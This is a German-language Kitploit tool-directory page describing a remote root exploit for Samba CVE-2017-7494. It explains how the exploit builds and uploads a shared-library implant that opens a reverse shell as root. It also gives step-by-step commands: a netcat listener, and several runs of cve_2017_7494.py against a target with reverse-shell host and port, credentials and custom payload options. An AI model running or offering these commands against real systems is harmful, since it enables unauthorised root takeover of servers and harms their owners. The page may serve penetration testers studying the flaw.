Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-7494 — Remote Root-Exploit für SAMBA CVE-2017-7494, der eine Shared Library als Payload kompiliert, diese auf eine beschreibbare Freigabe hochlädt und das Laden auslöst, um eine Reverse Shell als Root zu starten. | Kitploit
Tools/GitHubGitHub/sudlit/cve-2017-7494
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsRemote-Access-Tool
GitHubsudlit/cve-2017-7494

CVE-2017-7494

Remote Root-Exploit für SAMBA CVE-2017-7494, der eine Shared Library als Payload kompiliert, diese auf eine beschreibbare Freigabe hochlädt und das Laden auslöst, um eine Reverse Shell als Root zu starten.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-7494

Remote Root-Exploit für die SAMBA CVE-2017-7494 Schwachstelle.

Details

Dieser Exploit ist in 2 Teile unterteilt:

  • Zunächst wird ein Payload namens "implant.c" kompiliert und eine Bibliothek (libimplantx32.so oder libimplantx64.so) erzeugt, die zum Root-Benutzer wechselt, sich vom Elternprozess löst und eine Reverse Shell startet.
  • Zweitens sucht es nach einer beschreibbaren Freigabe auf dem angegebenen Zielhost, lädt die Bibliothek mit einem zufälligen Namen hoch und versucht, sie zu laden.

Solange das Ziel angreifbar ist und der Payload für das Betriebssystem und die Architektur des Ziels korrekt ist, ist der Exploit zu 100% zuverlässig.

Wie man es verwendet

Führen Sie auf Ihrem Rechner den folgenden Befehl aus:

root@kitploit:~
$ nc -p 31337 -l

Führen Sie dann den Exploit gegen Ihr Ziel aus und warten Sie, bis er sich mit Ihrem Netcat verbindet:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Wenn Sie die Reverse Shell zu schnell schließen, können Sie anstatt den Exploit erneut auszuführen und das Modul hochzuladen, einfach den Pfad zum bereits hochgeladenen Modul angeben. Angenommen, es wurde als "module.so" in /shared/directory/ hochgeladen, würden Sie einen Befehl wie den folgenden ausführen:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

UPDATE 25.11.2017 - Archivaldo

Sie können den Exploit jetzt gegen Samba 3.5.0 und 3.6.0 ausführen, Sie müssen nur das Argument -o 1 hinzufügen.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Sie können jetzt Ihre eigene benutzerdefinierte .so verwenden.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

Falls Sie dieses Skript von einer x86-Maschine ausführen müssen, erstellt das Kompilieren der Implant-Binaries zwei x86-Dateien. Mit dem Flag -n 1 können Sie die Kompilierung deaktivieren und die libimplantx64.so von einem anderen Rechner kopieren.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

Falls Samba nur auf Port 139 läuft. Sie können den Remote-Server-Port mit dem Argument -p festlegen.

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

ANMERKUNGEN

Ich unterstütze es nicht mehr.

-- Joxean Koret

Tool herunterladen